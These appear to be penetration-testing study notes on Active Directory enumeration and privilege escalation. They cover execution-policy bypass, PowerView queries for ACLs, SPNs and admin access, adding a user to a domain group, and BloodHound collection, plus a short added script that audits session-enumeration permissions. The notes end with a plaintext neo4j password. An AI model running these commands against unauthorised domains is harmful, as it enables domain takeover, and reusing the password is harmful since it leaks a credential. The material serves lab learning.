Enumeration

NOTE: Goal is to escalate privileges to Domain Administrator

Initial Access

RDP

xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared

Enumeration

Manual

NOTE: Make sure to run the following!

powershell -ep bypass

Get users on domain

net user /domain

Get info on a particular user

net user <Username> /domain

Get groups on domain

net group /domain

Get info on a particular CUSTOM group

net group "<Group Name>" /domain

PowerView

NOTE: Remember to run the following

  • powershell -ep bypass

  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered results

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information about a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered results

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information about a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered results

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information about a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights of the current user on other computers

Find-LocalAdminAccess

To look for logged on users on target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If something is not right, check the permissions.

Permissions for NetSessionEnum are defined in the SrvsvcSessionInfo value (a binary security descriptor) under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: Remote machine must have Remote Registry service enabled

To check for permission

Get-Acl -Path <Registry Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
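Get-Acl on the key shows who can edit the key, not who NetSessionEnum itself allows. The following is an added example (not from the original notes) that decodes the SrvsvcSessionInfo value so you can audit which principals may enumerate sessions on a host; the function name and parameters are my own, and it assumes local read access to the LanmanServer\DefaultSecurity key.

```powershell
# Added example: decode the SrvsvcSessionInfo security descriptor that
# governs who may call NetSessionEnum on this host. Function name and
# parameter names are hypothetical; the registry path is the one the
# notes above reference.
function Get-SessionEnumPermission {
    [CmdletBinding()]
    param(
        [string]$KeyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity',
        [string]$ValueName = 'SrvsvcSessionInfo'
    )

    # The value is a REG_BINARY blob holding a self-relative security descriptor.
    $bytes = (Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction Stop).$ValueName
    if (-not $bytes) {
        throw "Value $ValueName not found under $KeyPath"
    }

    # Parse the raw bytes into a descriptor we can walk ACE by ACE.
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)

    foreach ($ace in $sd.DiscretionaryAcl) {
        # Resolve the trustee SID to an account name where possible.
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = '<unresolved>' }

        [pscustomobject]@{
            AceType    = $ace.AceType            # AccessAllowed / AccessDenied
            Principal  = $name
            Sid        = $sid.Value
            AccessMask = ('0x{0:X}' -f $ace.AccessMask)
        }
    }
}

# Usage: list every principal with an ACE on session enumeration. A host where
# broad groups such as Authenticated Users appear lets any domain user run
# Get-NetSession against it; a hardened host lists only privileged groups.
Get-SessionEnumPermission | Format-Table -AutoSize
```

Run it on the target host rather than remotely; the value is read through the local registry provider, so Remote Registry is not required.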

To enumerate Service Principal Names

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACLs

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

To enumerate all principals that have ActiveDirectoryRights = GenericAll on a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ACEs with ActiveDirectoryRights = GenericWrite on a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SIDs to names in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert a SID to a name individually

Convert-SidToName "<SID>"

Add a user to a group in the domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on the domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To enumerate a Group Policy Object

Get-GPO -Name "<Group Policy Name>"

EXAMPLE:

Get-GPO -Name "Default Domain Policy"

To enumerate a user's permissions on a Group Policy Object

Get-GPPermission -Guid <GPO GUID> -TargetType User -TargetName <Username>

NOTE: Only relevant if the returned permission contains either "ModifySecurity" or "FullControl"

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumeration with BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On Kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161
